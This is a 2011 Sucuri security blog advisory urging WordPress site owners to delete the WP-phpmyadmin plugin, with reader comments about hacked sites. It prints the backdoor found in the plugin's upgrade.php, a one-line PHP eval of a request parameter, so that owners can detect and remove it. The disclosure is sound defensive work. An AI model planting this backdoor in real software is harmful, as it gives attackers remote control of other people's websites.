• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

WP-phpmyadmin WordPress plugin – Delete it now

June 22, 2011David Dede

FacebookTwitterSubscribe

If you are using the WP-phpmyadmin WordPress plugin, delete it now. We are seeing multiple sites getting hacked through it and we are investigating what is going on.

On all the sites we’ve analyzed, the following code was found inside the wp-phpmyadmin/phpmyadmin/upgrade.php file:

<?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?>

This is not part of the plugin, and should be removed immediately!

The code snippet above is a backdoor and allows remote access to the affected sites with it installed.

We also noticed that it was removed from the WordPress plugin repository (originally here: wordpress.org/extend/plugins/wp-phpmyadmin/ ) and is no longer maintained (last update in 2007). Since it is not longer being updated, you shouldn’t be using it anymore.

EDIT: We had an opportunity to catch up with Andrew Nacin, a WordPress Core Member who stated:

The reason it had been pulled from the directory was that it had phpMyAdmin setup files in it, which can expose server information.

So the plugin wasn’t removed because of any security issue, but because of the recent weird activity and due to the fact that it is not maintained, we recommend deleting it as soon as possible.


If you’re seeing anything out of the ordinary, please let us know. If we find anything else, we will update the post.

If you are not sure if your site got hacked, you can scan it here: http://sitecheck.sucuri.net.

FacebookTwitterSubscribe

Categories: Vulnerability Disclosure, WordPress SecurityTags: Sucuri WordPress Plugin

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. Guest

    June 23, 2011

    WP Greet Box was also removed recently (probably for security reasons).

  2. eric_cmi

    June 23, 2011

    What about the plugin Portable phpMyAdmin?

    • Otto

      June 24, 2011

      That plugin fixed the security problem: http://wordpress.org/extend/plugins/portable-phpmyadmin/changelog/

      • Andres Armeda

        June 24, 2011

        Hi Otto, are you referring to Portable phpMyAdmin?

        The link you posted is redirecting to the plugin directory home page.

        Thanks.

        • Ayush Gupta

          January 19, 2012

          Looks like plugin is back in action

    • Andres Armeda

      June 24, 2011

      We haven’t seen any security issues with that plugin Eric.

      The thing to consider is that you’re giving direct access in the
      WordPress dashboard to modify the database. This is a huge risk when you
      consider users that aren’t experienced with this type of interaction.

      If it needs to be used in a production environment, it is highly
      recommended that the proper access control be applied, and that
      processes be implemented around the use of the functionality.

      Hope this helps!

  3. Web marketer

    June 28, 2011

    Hi,

    Thanks for the info.

    I’ve had a nightmare over the last 24 hours as ALL my sites were compromised and malicious code injected into the index.php files.

    I’ve now removed the phpmyadmin plugin (which had the corrupted code in the update file as you say) and all seems to be ok for the moment. Fingers crossed it stays that way.

    My question is…

    Could the hacker access and inject malicious code on all my sites (all on the same shared hosting server) even if the plugin was only installed on one of the domains?

    I ask because I want to know if this is the only plugin causing me woe or whether there are more I need to act on.

    Thanks again
    D

  4. Ed

    July 12, 2011

    Hey guys,

    First off i completely agree that having a phpadmin plugin in the WP Dashboard is a huge risk on so many different levels.  😉  With that said, have you looked at or tested the WordPress Adminer plugin? The coding looks really solid and minus some base64 encoded images it looks really solid.  Thanks.

  5. David

    October 17, 2011

    Hi, I am very pleased with the plugin.. does exactly what i wanted. Thanks for share!

  6. Ayush Gupta

    January 19, 2012

    Now this plugin is removed from WordPress because it was having malicious code

  7. Jrfalcon5

    July 15, 2012

    my website was hacked after installing this and it said “hacked by nolov3” and my website was gone.

  8. Guest

    November 19, 2013

    Doesn’t seem to be such a reliable claim. PhPMyAdmin is nowhere a low-quality malware, but instead a widely-used and quite nice tool. This article here seems to be indicating that the authors of that software deliberately wanted to do some backdoor things. This I highly doubt. http://www.phpmyadmin.net/home_page/security/ Hope more experienced people would provide some more knowledge on it.

  9. Timothy

    January 24, 2014

    Did you read the article? It is talking about WordPress plugin that packaged phpMyAdmin, and was insecure. They aren’t talking about the actual phpMyAdmin tool as being insecure, just the plugin.

  10. André Páscoa

    May 25, 2016

    Parabéns pelo post. Eatava a procura de um artigo assim.

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.